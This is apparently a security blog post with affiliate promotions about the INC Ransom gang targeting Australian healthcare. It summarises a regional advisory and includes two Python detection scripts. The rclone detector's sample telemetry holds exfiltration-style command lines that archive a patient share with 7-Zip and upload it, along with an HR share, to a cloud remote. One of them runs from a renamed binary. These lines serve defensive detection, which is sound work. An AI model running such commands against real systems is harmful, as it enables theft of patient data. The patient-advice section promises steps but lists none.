April 17, 2026 Ransomware

Australian Hospitals Under Fire: The INC Ransom Threat Targeting Healthcare in 2026

A joint advisory from the Australian Cyber Security Centre (ACSC), New Zealand's National Cyber Security Centre (NCSC-NZ) and Tonga's CERT has confirmed that the ransomware gang INC Ransom is actively targeting Australian hospitals and healthcare providers. With at least 11 confirmed incidents in Australia already, the threat is real, escalating, and demands urgent action.

Disclosure: This post contains affiliate links. We only recommend tools we've researched and trust. If you purchase through our links, we may earn a commission at no extra cost to you.

A Warning From the ACSC and Its Pacific Partners

In March 2026, the Australian Cyber Security Centre (ACSC) joined with the New Zealand National Cyber Security Centre (NCSC-NZ) and Tonga's CERT to issue a coordinated advisory about INC Ransom, a ransomware-as-a-service (RaaS) operation that has been systematically targeting healthcare and professional services organisations across the Pacific region.

The advisory documented at least 11 INC Ransom-related incidents responded to by the ACSC between July 2024 and December 2025, with the healthcare sector bearing the brunt of attacks. Since January 2025, the ACSC has observed a marked acceleration in INC Ransom affiliates specifically targeting Australian healthcare entities. This is not a distant threat: it is happening in hospitals right now.

INC Ransom is also tracked by threat intelligence firms under the aliases Tarnished Scorpion and GOLD IONIC, and has been active since 2023. The group operates a franchise model: a core development team builds and maintains the ransomware infrastructure, then leases access to affiliates who conduct the actual attacks in exchange for a cut of ransom payments. This model has proven devastatingly effective at scaling operations globally.

Why Is Australian Healthcare Being Targeted?

Healthcare organisations are uniquely attractive to ransomware operators for several reasons. Patient records — containing Medicare numbers, prescription histories, surgical records, and billing details — fetch high prices on criminal marketplaces. More critically, hospitals cannot simply shut down their systems and wait out an attack: disrupted patient care creates life-threatening urgency that pressures organisations to pay ransoms quickly, often without negotiating.

Australia's healthcare sector has also been grappling with a rapid shift to digitised patient records, connected medical devices, and cloud-based administrative systems. This expanded digital footprint, combined with historically underfunded IT and cybersecurity budgets in the public health system, creates a larger attack surface than most industries.

The sector has already been scarred by high-profile incidents. The 2024 MediSecure breach exposed the prescription data of approximately 12.9 million Australians, nearly half the country's population. Fertility provider Genea confirmed in February 2025 that hackers had accessed sensitive patient data. St Vincent's Health Australia, one of the country's largest non-profit hospital networks, suffered a significant cyberattack in December 2023 in which attackers stole data from its network. INC Ransom affiliates are now hunting in the same territory, with a more sophisticated and targeted methodology.

How INC Ransom Attacks Work

Getting In: Compromised Credentials

The ACSC advisory reveals that INC Ransom affiliates most commonly gain initial access through compromised user accounts — specifically targeting remote access tools and VPN gateways used by healthcare workers. Staff logging in from home, clinics, or satellite facilities represent an entry point that is difficult to monitor and easy to exploit when credentials have been stolen or guessed.

Once inside, affiliates create new administrator-level accounts, giving them persistent, hard-to-detect footholds even if the original compromised account is later locked out. Creating such an account already requires elevated rights, so by this stage the affiliate has either landed on a privileged account or escalated from an ordinary one. Either way, strong, unique passwords and multi-factor authentication on every account, privileged or not, are not optional extras in healthcare environments; they are foundational defences.

If your organisation or its staff reuse passwords across systems, or rely on simple, guessable credentials for remote access portals, you are operating with an unlocked front door. A dedicated password manager like NordPass can enforce unique, complex credentials across every system — eliminating the weak-link problem of human password habits at scale. NordPass Business also offers an organisational dashboard to identify and remediate weak or shared passwords across a team.

Moving Through Networks: Living Off the Land

After establishing a foothold, INC Ransom affiliates do not rely on flashy custom malware that trips antivirus alerts. Instead, they practise what security professionals call "living off the land": using legitimate, trusted tools, either already present on the network or quietly dropped alongside the utilities administrators already use, to move laterally and exfiltrate data.

The ACSC advisory specifically identified the use of 7-Zip (to compress and package stolen data) and rclone (to transfer that data to attacker-controlled cloud storage) as key tools in INC Ransom campaigns. Because these are legitimate, widely used utilities, signature-based security tools rarely flag them at all, and attackers routinely rename such binaries to blend in further. Detection therefore has to be behavioural: who is running an archiver on a file server, where an upload is going and how much data is leaving, rather than whether a known-bad file is present.

Double Extortion: Pay Twice or Lose Everything

INC Ransom employs a double extortion model. First, they encrypt the victim's files, rendering systems inoperable. Second — and this is the part that makes paying the ransom alone insufficient — they exfiltrate sensitive data before encryption and threaten to publish it on their public leak site unless an additional payment is made.

This means even an organisation with excellent backups that can restore systems without paying the encryption ransom still faces the threat of patient data being dumped publicly. Healthcare providers operate under strict obligations under the Privacy Act 1988 and the Notifiable Data Breaches scheme, making the prospect of a data dump especially damaging — financially, legally, and reputationally.

Web-Facing Systems: The Other Attack Vector

INC Ransom is not the only threat actor exploiting Australian healthcare right now. Security researchers have documented Storm-1175, a separate threat actor that exploits vulnerabilities in internet-facing applications to deploy ransomware. In a healthcare setting that means patient portals, appointment booking platforms, telehealth interfaces and other public-facing web applications are all potential entry points.

This makes the security of web-facing systems just as critical as internal network defences. A hospital patient portal with an unpatched vulnerability, or one whose web application firewall is misconfigured, hands attackers an entry point that needs no stolen VPN credential at all: the application is already reachable from the internet.

For organisations running websites and web applications as part of their healthcare delivery or administration, a web application firewall (WAF) and continuous malware scanning service like Sucuri provides a critical layer of protection. Sucuri's WAF filters malicious traffic before it reaches your server, while its monitoring service detects injected malware, defacements, and suspicious behavioural patterns in real time.

What Healthcare Organisations Must Do Right Now

The ACSC advisory does not pull its punches. It outlines a series of critical controls that all healthcare organisations — from large public hospital networks to small private practices — should implement immediately. Here is a practical breakdown:

1. Harden Remote Access

Since compromised remote access credentials are INC Ransom's primary entry point, securing every remote connection is the highest-priority action. Enforce multi-factor authentication (MFA) on all VPN connections, remote desktop sessions, and cloud application logins without exception, and prefer phishing-resistant methods (FIDO2 security keys or passkeys) over push notifications, which attackers can defeat with MFA fatigue. Consider deploying a zero-trust network access model, where every connection is verified regardless of location.

For staff connecting to clinical systems from home or satellite locations, a business-grade VPN like NordVPN encrypts all traffic in transit, making it harder for attackers on untrusted networks to intercept credentials or session tokens. NordVPN's Threat Protection feature also blocks known malicious domains at the connection level, stopping many phishing and malware delivery attempts before they reach the user's device. Be clear about the limit of this control, though: a consumer VPN tunnel protects traffic on the wire, while the entry point described in the advisory is a stolen or guessed credential used against the organisation's own remote access gateway, and only MFA and monitoring on that gateway address it.

2. Implement Privileged Access Controls

INC Ransom affiliates entrench themselves by creating new admin accounts. Organisations should implement a least-privilege model, in which users only have the permissions their role needs, and alert on the creation of new accounts and on any addition to a privileged group such as Domain Admins or a server's local Administrators group. Privileged access management (PAM) tools can enforce approval workflows for any privilege elevation, adding a chokepoint that attackers find difficult to bypass silently.
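As an added example (not code from the ACSC advisory or this post), the following Python implements the alert described above over a handful of constructed Windows Security log records. The event IDs and field names are the real ones (4720 account created; 4728, 4732 and 4756 member added to a global, local or universal group; the 512/518/519 RIDs and S-1-5-32-544 for the privileged groups), but the hosts, user names, SIDs and the 24-hour correlation window are assumptions. Any privileged-group addition is raised at medium severity; one whose member account was itself created within the window is raised as critical, which is the "new admin account" pattern the text describes.

```python
"""Detect new accounts being placed into privileged groups.

Added example for this post, not code from the ACSC advisory. It runs over
constructed Windows Security log records (field names follow the real
4720/4728/4732/4756 event schema; the hosts, users and SIDs are made up).
"""
from datetime import datetime, timedelta

# Well-known RIDs/SIDs for privileged groups (real values).
DOMAIN_PRIV_RIDS = {"512": "Domain Admins", "518": "Schema Admins", "519": "Enterprise Admins"}
BUILTIN_ADMINS = "S-1-5-32-544"
GROUP_ADD_EVENTS = {4728, 4732, 4756}     # member added to global / local / universal group
NEW_ACCOUNT_WINDOW = timedelta(hours=24)  # assumed tuning value

# Constructed sample events (not real telemetry).
EVENTS = [
    {"EventID": 4720, "TimeCreated": "2026-03-02T02:13:40", "Computer": "DC01.corp.local",
     "SubjectUserName": "jsmith", "TargetUserName": "svc_update",
     "TargetSid": "S-1-5-21-1111-2222-3333-1107"},
    {"EventID": 4728, "TimeCreated": "2026-03-02T02:14:05", "Computer": "DC01.corp.local",
     "SubjectUserName": "jsmith", "MemberSid": "S-1-5-21-1111-2222-3333-1107",
     "TargetUserName": "Domain Admins", "TargetSid": "S-1-5-21-1111-2222-3333-512"},
    {"EventID": 4732, "TimeCreated": "2026-03-02T02:20:11", "Computer": "FILESRV01.corp.local",
     "SubjectUserName": "svc_update", "MemberSid": "S-1-5-21-1111-2222-3333-1107",
     "TargetUserName": "Administrators", "TargetSid": BUILTIN_ADMINS},
    {"EventID": 4720, "TimeCreated": "2026-03-02T09:30:00", "Computer": "DC01.corp.local",
     "SubjectUserName": "it_admin", "TargetUserName": "nurse_new",
     "TargetSid": "S-1-5-21-1111-2222-3333-1108"},
    {"EventID": 4728, "TimeCreated": "2026-03-02T09:31:00", "Computer": "DC01.corp.local",
     "SubjectUserName": "it_admin", "MemberSid": "S-1-5-21-1111-2222-3333-1108",
     "TargetUserName": "Clinical Staff", "TargetSid": "S-1-5-21-1111-2222-3333-1201"},
    {"EventID": 4728, "TimeCreated": "2026-03-05T10:00:00", "Computer": "DC01.corp.local",
     "SubjectUserName": "it_admin", "MemberSid": "S-1-5-21-1111-2222-3333-1050",
     "TargetUserName": "Domain Admins", "TargetSid": "S-1-5-21-1111-2222-3333-512"},
]


def privileged_group(sid):
    """Return the privileged group name for a SID, or None if it is not one."""
    if sid == BUILTIN_ADMINS:
        return "Administrators (built-in)"
    if sid.startswith("S-1-5-21-"):
        return DOMAIN_PRIV_RIDS.get(sid.rsplit("-", 1)[-1])
    return None


def scan(events):
    """Correlate 4720 (account created) with later privileged-group additions."""
    created = {}   # TargetSid -> (creation time, creator, account name)
    alerts = []
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        if ev["EventID"] == 4720:
            created[ev["TargetSid"]] = (datetime.fromisoformat(ev["TimeCreated"]),
                                        ev["SubjectUserName"], ev["TargetUserName"])
            continue
        group = privileged_group(ev["TargetSid"]) if ev["EventID"] in GROUP_ADD_EVENTS else None
        if group is None:
            continue
        alert = {"time": ev["TimeCreated"], "computer": ev["Computer"], "actor": ev["SubjectUserName"],
                 "member_sid": ev["MemberSid"], "group": group, "severity": "medium",
                 "reason": "member added to privileged group"}
        origin = created.get(ev["MemberSid"])
        if origin:
            age = datetime.fromisoformat(ev["TimeCreated"]) - origin[0]
            if timedelta(0) <= age <= NEW_ACCOUNT_WINDOW:
                alert.update(severity="critical", member=origin[2],
                             reason=f"account created by {origin[1]} only {int(age.total_seconds())}s earlier")
        alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in scan(EVENTS):
        print(f"[{a['severity'].upper():8}] {a['time']} {a['computer']} {a['actor']} -> {a['group']}: {a['reason']}")
```

On the constructed input this raises two critical alerts for svc_update (created by jsmith at 02:13, put into Domain Admins 25 seconds later and into a file server's local Administrators six minutes after that) and one medium alert for the long-standing account added to Domain Admins days later; the Clinical Staff addition is ignored. In production the same correlation would run in the SIEM with the window and group list tuned to the environment.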

3. Monitor for Lateral Movement

Deploy security information and event management (SIEM) tooling or engage a managed detection and response (MDR) provider who can identify the behavioural signatures of lateral movement — unusual rclone activity, large outbound data transfers, unexpected use of 7-Zip on server infrastructure. Many healthcare organisations lack the internal security operations capacity to detect these patterns; outsourcing detection to a specialist is a pragmatic alternative.
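The behavioural signatures mentioned in the "Living Off the Land" section and in step 3 above can be expressed as detection logic. The Python below is an added example, not code from the ACSC advisory or this post: it scans constructed process-creation records (fields loosely modelled on Sysmon Event ID 1 / Windows 4688), flags 7-Zip creating an archive on a server or with a password, flags rclone by the shape of its arguments so that a renamed binary is still caught, and escalates when the rclone upload source is an archive that 7-Zip just created for the same host and user. The host names, users, paths, asset inventory and the short rclone flag list are assumptions.

```python
"""Behavioural detection of the 7-Zip staging + rclone upload pattern.

Added example, not code from the ACSC advisory or this post. It scans
constructed process-creation records (fields loosely modelled on Sysmon
Event ID 1 / Windows 4688); the hosts, users, asset inventory and paths
are assumptions, and the rclone flag list is a small illustrative subset.
"""
import re
import shlex

SERVER_HOSTS = {"FILESRV01", "SQL01", "DC01"}          # assumed asset inventory
SEVENZIP = {"7z.exe", "7za.exe", "7zr.exe"}
RCLONE_FLAGS = {"--transfers", "--config", "--bwlimit", "--no-check-certificate", "--ignore-existing"}
# rclone remotes are written "name:path"; requiring a 2+ character name skips Windows drive letters.
RCLONE_REMOTE = re.compile(r"^[A-Za-z0-9_-]{2,}:")

# Constructed sample telemetry (not real logs).
EVENTS = [
    {"host": "FILESRV01", "user": "CORP\\svc_backup", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    {"host": "FILESRV01", "user": "CORP\\jsmith", "image": r"C:\Users\jsmith\AppData\Local\Temp\7z.exe",
     "cmdline": r'7z.exe a -mx1 -p"p4ss" C:\Temp\pat.7z "D:\Shares\Patients\"'},
    {"host": "FILESRV01", "user": "CORP\\jsmith", "image": r"C:\Users\jsmith\AppData\Local\Temp\rclone.exe",
     "cmdline": r"rclone.exe copy C:\Temp\pat.7z mega:dump --transfers 16 --config C:\Temp\r.conf"},
    {"host": "SQL01", "user": "CORP\\adm_tmp", "image": r"C:\ProgramData\svchost.exe",   # renamed rclone
     "cmdline": r"svchost.exe sync D:\Shares\HR mega:hr --transfers 32 --config C:\ProgramData\rc.conf"},
    {"host": "WKS-RECEPTION", "user": "CORP\\rsmith", "image": r"C:\Program Files\7-Zip\7z.exe",
     "cmdline": r"7z.exe x C:\Users\rsmith\Downloads\forms.zip"},   # routine extraction, benign
]


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def tokens(cmdline):
    """Split a Windows command line; posix=False keeps backslashes and quotes intact."""
    try:
        return shlex.split(cmdline, posix=False)
    except ValueError:            # unbalanced quotes: fall back to whitespace split
        return cmdline.split()


def detect_7zip(ev):
    """Flag 7-Zip *creating* an archive ('a'); extraction is everyday activity."""
    toks = tokens(ev["cmdline"])
    if not toks or (basename(ev["image"]) not in SEVENZIP and basename(toks[0]) not in SEVENZIP):
        return None
    if (toks[1].lower() if len(toks) > 1 else "") != "a":
        return None
    indicators = []
    if ev["host"] in SERVER_HOSTS:
        indicators.append("archiving_on_server")
    if any(t.startswith("-p") for t in toks[2:]):           # -p sets an archive password
        indicators.append("password_protected")
    if not ev["image"].replace("\\", "/").lower().startswith("c:/program files"):
        indicators.append("binary_outside_program_files")
    archive = next((t for t in toks[2:] if not t.startswith("-")), None)
    severity = "high" if len(indicators) >= 2 else "medium" if indicators else "low"
    return {"rule": "7zip_staging", "severity": severity, "host": ev["host"], "user": ev["user"],
            "archive": archive, "indicators": indicators}


def detect_rclone(ev):
    """Flag rclone by name or, if renamed, by its verb + remote + flag pattern."""
    toks = tokens(ev["cmdline"])
    if not toks:
        return None
    named = "rclone" in basename(ev["image"]) or "rclone" in basename(toks[0])
    flags = {t.lower() for t in toks if t.startswith("--")} & RCLONE_FLAGS
    verb = toks[1].lower() if len(toks) > 1 else ""
    remotes = [t for t in toks[2:] if RCLONE_REMOTE.match(t) and "\\" not in t]
    if not (named or len(flags) >= 2 or (verb in {"copy", "sync", "move"} and remotes)):
        return None
    return {"rule": "rclone_exfil", "severity": "high" if remotes else "medium", "host": ev["host"],
            "user": ev["user"], "remote": remotes[0] if remotes else None,
            "source": toks[2] if len(toks) > 2 else None, "renamed_binary": not named}


def scan(events):
    """Run both rules; an rclone upload of an archive 7-Zip just built for the same host/user is critical."""
    alerts, staged = [], {}
    for ev in events:
        key = (ev["host"], ev["user"].lower())
        hit = detect_7zip(ev)
        if hit:
            alerts.append(hit)
            if hit["archive"]:
                staged[key] = hit["archive"].strip('"').lower()
        hit = detect_rclone(ev)
        if hit:
            src = (hit["source"] or "").strip('"').lower()
            if key in staged and src and staged[key] == src:
                hit["severity"] = "critical"
                hit["note"] = "uploads the archive just created by 7-Zip on this host"
            alerts.append(hit)
    return alerts


if __name__ == "__main__":
    for a in scan(EVENTS):
        print(f"[{a['severity'].upper():8}] {a['rule']:13} {a['host']} {a['user']} -> {a.get('remote') or a.get('archive')}")
```

The sample run yields a high-severity staging alert (7-Zip building a password-protected archive of a patient share on a file server from a Temp directory), a critical alert when rclone ships that same archive to a cloud remote, and a high-severity alert for the renamed copy on SQL01 that is recognised purely from its `sync ... mega:hr --transfers --config` argument shape; the receptionist extracting a download is not flagged. The same logic translates directly into a SIEM correlation rule, with the server list and rclone flags drawn from the real environment.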

4. Maintain Tested Offline Backups

Backups are only useful if they are offline or immutable (so ransomware cannot encrypt or delete them too), current, and regularly tested. The ACSC recommends following the 3-2-1 backup rule: three copies of data, on two different media types, with one stored offsite. Critically, restore tests should be conducted regularly; discovering that backups are corrupted or incomplete during an active incident is a catastrophic outcome. Remember too that backups address only the encryption half of INC Ransom's double extortion: they do nothing about data that has already been stolen.

5. Patch and Update Consistently

Many ransomware campaigns exploit known, publicly-disclosed vulnerabilities in systems that have not been patched. Healthcare IT teams should prioritise patching of internet-facing systems and remote access infrastructure. The ACSC's alerts and advisories page provides up-to-date guidance on actively exploited vulnerabilities — it should be on every IT team's daily reading list.

What Should Patients Do?

If you receive notification that a healthcare provider has suffered a data breach — or if you suspect your health data may have been compromised — take these steps immediately:

The Bigger Picture: Healthcare Cybersecurity Cannot Wait

The INC Ransom advisory is a stark reminder that Australian healthcare is squarely in the crosshairs of sophisticated, well-resourced criminal organisations. The franchise model of ransomware-as-a-service means the pool of potential attackers grows constantly — any aspiring criminal can rent access to proven ransomware infrastructure and target a hospital with relatively little technical expertise.

Successive Australian governments have increased investment in national cybersecurity capability, and the ACSC's proactive advisory work is genuinely valuable. But the front line of defence sits within individual healthcare organisations — their IT teams, their clinical staff, and the security practices embedded in their day-to-day operations.

The cost of a ransomware attack on a hospital — in ransom payments, system recovery, regulatory penalties, reputational damage, and most importantly, the potential impact on patient care — vastly exceeds the cost of preventative security measures. The question is not whether Australian healthcare can afford to invest in cybersecurity. It is whether it can afford not to.

Stay Protected

Check out our recommended security tools to protect your digital life today.